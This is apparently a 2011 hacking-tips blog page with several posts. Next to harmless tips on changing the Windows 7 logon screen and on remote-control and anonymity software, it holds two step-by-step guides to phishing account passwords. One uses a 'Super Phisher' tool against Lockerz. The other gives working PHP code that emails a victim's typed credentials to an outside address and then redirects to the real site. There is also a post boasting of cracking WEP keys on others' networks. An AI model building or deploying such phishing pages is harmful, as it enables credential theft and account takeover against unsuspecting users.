Sunday, December 11, 2011

How to change logon background/screen in windows 7



If you think the usual logon screen is quit bore to see. You have a option to change it to your favour. Look at the following steps to do….


1.First launch regedit then go to : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
\CurrentVersion\Authentication\LogonUI\Background 

regedit
2.Change the vaulue of  OEMBackground to 1,which indicate to enale logon background customization  in windows 7
change_logon_sreen

Tip:If you can not find this entry in your registry,please try to create one.
3.Go to %windir%\system32\oobe\ ,create folder info then create another folderbackgrounds under info,then copy your own background picture here and rename it tobackgrounddefault
change_win7_logon_sreen

Note:The size of this picture must be less than 256k ,or it will not work.
4.Done,you can see your new logon background after logoff.It’s so easy,isn’t it!

Do you have questions, comments, or suggestions? Feel free to post a comment!  


Saturday, December 10, 2011

How to Create Your Own Phisher to Hack Any Website Account Password

Learn how to hack any website account password | Phishing Creator Tool

Previously i've posted how to hack websites using phishing, like eBay, Gmail and Facebook. Here GV want to show you how to make a phishing page using a Phishing Creator - Super Phisher and get account information for various websites from many people. Тhis is the easyest and also a very effectively way to make a phisher and hack any website account password.

Here are some features of Super Phisher:
  • Fastest phisher maker tool ever
  • Makes phisher for almost any site
  • Useful for users who dont knows HTML, PHP coding
  • No manual work except entering URL of website, for which u want to make phisher
  • Fully automated tool
  • Small in size.
  • Instant access to phishers you created.

For example i will show you how to make a phishing site of Lockerz.com.

Here is a step by step guide to hack any website account password using phishing creator tool:

1. First of all download Super Phisher here.

2. In "Super Phisher" folder, open "Super Phisher.exe" file to get something like:


3. Now, in "URL of Login Page", enter http://www.lockerz.com. This is the site you wanna hack.

4. In "Name of Log File" write password.txt or whatever you like. This is the place where all typed id and password are stored. In "Name of PHP File" also type anything you like, e.g. lockerz.php or login.php...

5. In field of "Site redirect to", enter http://www.lockerz.com/myLocker, so that victim is redirected to original Locker site when he enters his email and password.

6. Click on "Build Phisher" and you will get Lockerz phisher created in "Output" folder in current directory.

7. Upload all of the phisher files to any free webhost site like:
8. Once you have uploaded the files in the directory, send this phisher link to your victim and make him login to his Lockerz account using your sent Phisher.

9. Once he logs in to his Lockerz account using Phisher, all his typed email and password is stored in "password.txt".


10. Now you can see password in this .txt file and hack Lockerz account password.


Super Phisher is just awesome software to hack Lockerz account password. This software not only is used to hack Lockerz account password, but also can hack orkut, gmail, yahoo, myspace and many other emails.


Also read:
How to Make a Phisher - Step by Step Tutorial 

Do you have questions, comments, or suggestions? Feel free to post a comment! 

How to Make a Phisher to Hack Any E-Mail Account Password

Make a phishing page to get account information for various websites from many people

Previously i've posted how to hack TwittereBayGmail and Facebook account passwords using phishing. Basicly phishing is way of sending a fake page to victim which resembles the original page and ask the victim to login with the provided modified page called as phisher. This the most popular method used by hackers to hack email account passwords like myspace, gmail, yahoo, orkut, facebook, etc. Here, i will inform you the method to make a "phisher".
How to Make Phisher to Hack E-Mail Account Passwords:


Making a phisher is very simple. You don’t have to know anything about coding. Just follow me as mentioned in below steps:

1. First of all go to the website you want to copy, and locate the login page.


2. Right click, and click on Source. Highlight all and copy onto a text document.

3. Go into the source and search for <form (Ctrl + F and search the code), when you find it look along the tag and find action=" and inside it there will be a URL, delete that url and type in login.php

4. Now you need to find where the textboxes are. To do this find a label next to one of the inputs, eg 'E-mail address:' Then go into the source and search for 'E-mail address:' then follow it along until you see <input name= "login"

Click on the image to see the full size

5. Now open up notepad and post the following code, and then follow instuctions after the //

<?php
//replace login with the input of email. (Email form)
$log_email = $HTTP_POST_VARS['login'];
$Password = $HTTP_POST_VARS['password'];
//Put your email here
$to = 'ozsanchez@hotmail.co.uk';
//Put what you want the subject to be
$subject = 'New password found, $log_email's email.';
//define the message to be sent. Each line should be separated with \n
$message = "E-mail: $log_email\n\nPassword: $Password";
//define the headers we want passed. (who the email is from). Note that they are separated with \r\n
$headers = "From: ozsanchez@hotmail.co.uk";
//send the email
$mail_sent = @mail( $to, $subject, $message, $headers );
//redirect asap to offical website.
header('Location: https://login.live.com/ppsecure/post.srf?id=66262');
?>

6. Save it as login.php

7. Upload both files onto your website or to a free-hosting site like:

Good trick to make link longer is to put '?' after any page and put anything after it.

You can get someones ip address by if you put at the top of the login.php file this code:

$ip_address = $_SERVER['REMOTE_ADDR'] 


Note: I have written this article to make you aware of how phishing is done. I am not in any way responsible for any action performed by the reader. The reader is solely responsible for his action. (as Mentioned in GV's Info)



Do you have questions, comments, or suggestions? Feel free to post a comment! 

Wireless Wep Key Hacking - For Beginners

 Thousands of articles have been written about the vulnerability of WEP (Wired Equivalent Privacy), but how many people can actually break WEP encryption? Beginners to WEP cracking have often been frustrated by the many wireless cards available and their distribution-specific commands. And things are further complicated when the beginner is not familiar with Linux.

In this post i will show you a book Wireless Wep Key Hacking where the author gives you a step by step approach to breaking a WEP key. The entire attack is done with publicly available software and doesn't require special hardware.



The author of this book is Haider Afridi, an expert into the field of hacking and security. This book is a complete guide of hacking WEP keys, and the best part of this e-book is that he has written it in such a manner that even a 5th grade kid can understand it.

I have personally hacked more than 10 wirelesses using the method presented in this book.

If you think this book is something you would be interested in, you can get it here,



Do you have questions, comments, or suggestions? Feel free to post a comment! 


How To Control Your Computer with Your Mobile Phone

Remotely Control Your PC from Anywhere with Your Cell Phone!

Have you ever been away from your desktop and needed some information that was on it? Have you ever needed to shutdown your computer or do something underhanded while away? In this post I am going to show you how to control your PC from your Cell Phone.

There is a program called CellPC that allows you to perform operations on your home/work PC via your cell phone or wireless device quickly and easily. Imagine being able to shutdown, restart, or logoff your PC remotely... search files on your computer and then send them to your cell phone... view a realtime screenshot of your computer at anytime... lockdown your computer... send a message/note/reminder to your computer... and much more!

CellPC Top Features:

  • Perform Shutdowns, Restarts, Logoffs
  • View a Screenshot of your Computer
  • Search for and Retrieve Files
  • View and Close Open Windows
  • Customizable Commands Editing
  • Be Alerted when your Computer is Used View and Close Open Applications
  • Send Messages to your Computer
  • Lock and Unlock your Computer
  • Secure Command Execution
  • Log all Access Attempts and Commands
  • Disable/Enable Commands at will


How does CellPC Work? 



Will CellPC Work for Me?

CellPC can work with any Windows computer as long as it has a steady internet connection while the software is running.

If you want to verify that CellPC will work with your device, contact the CellPC support team so you can send them a test message from your phone.



Do you have questions, comments, or suggestions? Feel free to post a comment! 

Surf Anonymously Without a Trace with Max AnonySurf

With online crimes on the rise and there constantly evolving technology, online security has become the major concern for the internet users.

Max Secure Software has developed anonymizing software Max AnonySurf to protect the privacy and secure the identity by staying one step ahead of these online predators. Max AnonySurf hides your IP address so that online snoops are unable to track the sites you visit and build profiles on your Internet activities. Max AnonySurf also protects you from unintentionally visiting websites that are known to be phishing, pharming, or spyware sites.

Anonymous Surfing works by providing anonymous proxies between your computer and the Internet to shield you. It's simple to setup and use, and it works silently in the background, without slowing down your Internet connection. Others can not see which ip address you are using to surf. It even rotates proxy addresses so you do not show one ip address to outside world.

Once you install on your own computer, it will allow you to surf the web with privacy. This local proxy server includes a database with several anonymous public proxy servers located all over the world. The program is essential for those who value their privacy and who want to surf the web anonymously.

Max AnonySurf Top Features:

  • Max AnonySurf keeps your IP, or Internet address, unlisted so you can surf the Internet without being tracked and keep your online activities private.
  • Max AnonySurf is easy to use. Makes a snap for even novice users so you can start surfing anonymously with a single click of a button. Just install it and get started!
  • Automatic protection - Starts automatically when you turn on your PC and runs silently in the background without slowing down your Internet connection for hassle-free security.
  • Max AnonySurf works by providing anonymous proxies between your computer and the Internet to shield you. Others cannot see which IP address you are using to surf. It even rotates proxy addresses so you do not show one IP address to outside world.
  • You can set the timer to rotate the proxy address when you are surfing.


Max AnonySurf is one of the best anonymizing softwares I've tried, but still it's the cheapest software on the market with price of only $9.99. So if you are looking for a software that can protect your privacy and secure your identity, but still includes both, quality and small price, you wont regret if you try Max AnonySurf.


Do you have questions, comments, or suggestions? Feel free to post a comment! 


Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More